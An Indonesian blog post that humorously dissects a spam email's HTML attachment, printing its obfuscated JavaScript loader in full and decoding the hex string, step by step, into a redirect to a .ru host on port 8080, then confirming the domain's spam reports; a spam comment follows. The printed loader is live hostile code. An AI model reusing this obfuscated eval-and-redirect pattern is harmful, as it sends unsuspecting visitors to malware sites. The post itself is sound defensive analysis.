Pagi-pagi kok iseng, kamu spam aku? Dan akupun tak rela dimadu

Tadi pagi dapat email. Disuruh buka attachmentnya. Katanya kita disuruh donlot file berjenis HTM (pasti HTML) udah gitu disuruh buka pakai internet explorer. Hahaha… Buluketek, ini pasti spam. Tapi karena saya iseng pagi ini dan ada sedikit waktu. Mari bermain.

1. Ini kode mentahnya (yang pasti bukan lagu kode-nya Warkop DKI)

<html>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″>
<title>Please wait</title>
</head>
<body>
<h1><b> You will be forwarded… Wait please…</h1></b>
<h4>Internet Explorer compatible only! </h4><br>

<script>p=parseInt;ss=(1)?String.fromCharCode:0;asgq=”76!61!72!31!3d!34!3@!3b!a!76!61!72!32!3d!76!61!72!31!3b!a!6@!66!28!76!61!72!31!3d!3d!76!61!72!32!2@!20!7b!64!6f!63!75!6d!65!6e!74!2e!6c!6f!63!61!74!6@!6f!6e!3d!22!68!74!74!70!3a!2f!2f!68!6a!75!6@!6f!70!73!64!62!67!70!2e!72!75!3a!38!30!38!30!2f!66!6f!72!75!6d!2f!6c!6@!6e!6b!73!2f!63!6f!6c!75!6d!6e!2e!70!68!70!22!3b!7d”.replace(/@/g,”9″).split(“!”);try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=193;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window[“e”.concat(“v”+”al”)];}
s=””;if(zz)for(i=0;i-107!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}
if(zz)e(s);}}</script>

</body>
</html>

2. Mari dipecah. Selain hex, saya tidak memikirkan yang lain. Capek saya. Hidup saya sudah berat dan dipaksa harus memikirkan kode yang dibuat oleh pujangga lain, mati akuuh… (halah lebay, haha).
Ketika ada tulisan replace(/@/g,”9″)kalau begitu, semua yang ada tanda @ nya diganti jadi 9. Daripada susah-sudah mendingan pake tool find and replace. Hehe. Maklum, saya kan males banget orangnya. Maka hasilnya adalah cuma tiga angka yang pakai @:
2@ (lalu saya terjemahkan jadi 29)
3@ (lalu saya terjemahkan jadi 39)
6@ (lalu saya terjemahkan jadi 69)

3. Hasilnya adalah:

76!61!72!31!3d!34!39!3b!a!76!61!72!32!3d!76!61!72!31!3b!a!69!66!28!76!61!72!31!3d!3d!76!61!72!32!29!20!7b!64!6f!63!75!6d!65!6e!74!2e!6c!6f!63!61!74!69!6f!6e!3d!22!68!74!74!70!3a!2f!2f!68!6a!75!69!6f!70!73!64!62!67!70!2e!72!75!3a!38!30!38!30!2f!66!6f!72!75!6d!2f!6c!69!6e!6b!73!2f!63!6f!6c!75!6d!6e!2e!70!68!70!22!3b!7d

4. Karena ada nyanyian kode berlirik split(“!”), maka lagi lagi karena males saya ganti semua tanda ! jadi spasi. Lagi-lagi pake Edit > find and replace (kebetulan lagi pakai windows dan disana ada software canggih namanya notepad, jadi gampang. Tinggal mencet ctrl+H udah beres dah.

Hasil:
76 61 72 31 3d 34 39 3b a 76 61 72 32 3d 76 61 72 31 3b a 69 66 28 76 61 72 31 3d 3d 76 61 72 32 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 68 6a 75 69 6f 70 73 64 62 67 70 2e 72 75 3a 38 30 38 30 2f 66 6f 72 75 6d 2f 6c 69 6e 6b 73 2f 63 6f 6c 75 6d 6e 2e 70 68 70 22 3b 7d

5. Kelihatan kalau semua hasil dari notepad saya kopi paste dan masukkan ke http://www.string-functions.com/hex-string.aspx (darimana saya tahu ini angka hex? Bukan angka togel? Tentu saja dari Ascii Table, kakak :)  Kenapa pakai ASCII? Mungkin karena ia mau mencari wanita lain untuk dikawini. http://www.asciitable.com/ (//Makin ngaco saya. Apa hubungannya?)

6. Dapat alamat domain yaitu hjuiopsdbgp. Ini terjemahan hex nya:
var1=49;§f##×f#ºif(var1==var2) {document.location=”h t t p ://hjuiopsdbgp. ru:8080/forum/links/column.php”;}

7. Cek domain hjuiopsdbgp di urlquery. Ternyata banyak laporan kalau mereka ini spammer http://urlquery.net/report.php?id=1621594

8. Cek spam dan keamanan di Eye on Spam info collector. Sekedar cek en ricek konfirmasi, hehe. Benar juga, mereka memang spammer yang mengatasnamakan fax untuk perusahaan http://cbnetsecurity.com/colors/archives/2265

9. Minta teman-teman saya agar hjuiopsdbgp disuruh push-up sebentar biar sadar kalo mereka itu iseng banget sih pagi-pagi nyuruh saya mikir. Kalau hjuiopsdbgp masih iseng juga, nanti saya bilangin mamanya. Biar disetrap di pojok kebon belakang. Hehehe

 

(*Yeah, I know, misleading title. Hehe*)

This entry was posted in security, spam and tagged , , , . Bookmark the permalink.

One Response to Pagi-pagi kok iseng, kamu spam aku? Dan akupun tak rela dimadu

  1. Script Togel says:

    I’m just extremely fascinated with the crafting advantages and even while using the format on your website Script Togel. Are these claims some sort of settled topic or even did you change the item by yourself? Anyways stay in the wonderful top quality producing, it can be rare to look a terrific web site just like it now.

Leave a Reply

Your email address will not be published. Required fields are marked *